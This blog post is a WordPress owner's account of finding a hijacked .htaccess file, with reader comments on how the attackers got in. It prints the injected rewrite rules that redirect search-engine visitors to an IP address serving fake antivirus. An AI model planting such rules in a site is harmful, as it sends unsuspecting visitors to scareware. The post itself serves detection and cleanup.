Is Your Blog Vulnerable To Attack?

By Cenay Nailor | Wordpress

Nov 25

A few days ago, I was working on one of my blogs, and I happen to notice that the .htaccess file was larger than I remembered. I am talking about file size here . Yeah, I know. It’s not the kind of thing most people notice, but I kinda have a thing for numbers. And yes , I am a geek.

Anyway… I notice the file size and start thinking, it shouldn’t be that large. So, I download it from my domain to take a peek. Sure enough, some scum bag (bleep) piece of (bleep) hacker type has uploaded a new .htaccess file. It’s purpose? To fake people out and sell anti-virus software. That’s it.

The .htaccess file’s real purpose is to help WordPress display *pretty links* as the URL. It takes the title of the post and adds dashes and uses that as the URL. Great for Google Link Love ! I put a sample of what that looks like for a typical WordPress blog below. You might want to compare yours…

# BEGIN WordPress
RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L] # END WordPress

The modified .htaccess file basically says… if someone is *referred* from Google (or AOL, or Yahoo, etc), then display a little window that says they are being attacked, and then redirect them to the site where they can buy some protection. Piece of (bleep). The sad part is that this technique works on a lot of people. And they used MY site to do it!

Can you guess what that does to my reputation for first time visitors?

Here’s the additional code the piece of (bleep) added to my .htaccess file. Again, you might want to review yours and make sure it doesn’t include this.


RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC] RewriteRule .* http://89.28.13.202/in.html?s=ix [R,L]

Gotta Respect Google

The downside to having a popular blog? Google comes by often. This would be a good thing, normally . Except for one little thing. Google came by while the bogus .htaccess file was there! Net result? Google thought I was a malware site and setup a redirect page that basically said I was attacking my visitors. Yeah. Cool, huh?

But, you have to respect a service like Google that is simply focused on making the surfing experience a better one for their visitors. They included a note to the webmaster on the nasty-gram-page on what to do to clean your site. Google even offered a *review* process to make sure all the fixes took.

I requested a review at 11am this morning, and by 11pm, my site was back online. Kudo’s Google on having your process down pat and helping *the-little-guy* get back up and running so quickly.

So, do yourself a favor all you self-hosted bloggers out there … go check your .htaccess file. Make sure it only contains what you expect it to contain. And while you are there, update the permissions to remove the *write* feature. I did.

This Virus like behavior hack is also called

  • 89.28.13.202 virus
  • Redirection hack
  • .htaccess hack

Know of any other names it’s called by?

Follow

About the Site Owner

Cenay is a self-proclaimed geek with mad technical skills she loves sharing with Videos, Coaching and Articles. Need help? Click the Book 30 Minutes to find out if this is a good fit.

Leave a Comment:

(8) comments

Cenay,
Thanks for helping turn your experience into an education moment to help other bloggers. Great way to turn a negative into a positive!

I appreciate you, my friend!

Dali

Reply

Hey Cenay! Thanks for that post! That’s good stuff to know!
Stinkin hackers!

Reply

Thanks for posting this! This is very helpful. I saw this done to a site recently but I am not sure if they used htacess or how they did it.

Dumb question – how do they get in?

Reply

Anna, it’s not a dumb question, just one that can’t be answered easily. In fact, I have my hosting company investigating it even as I type this.

Each web address has a unique IP address, and each hosting account has a unique login. They (low-life hackers) use a program that uses brute force password crackers to stuff passwords until they get a hit.

Since I video steps showing how to create sub domains, install WordPress (and the like), I frequently display my control panel. While I block out certain fields, they may have found my user ID and gone from there.

All we can do is change passwords frequently, report any problems and work hard to stay a step ahead. It’s a full time job since these losers have nothing better to do.

Reply
Add Your Reply

Leave a Comment:

..also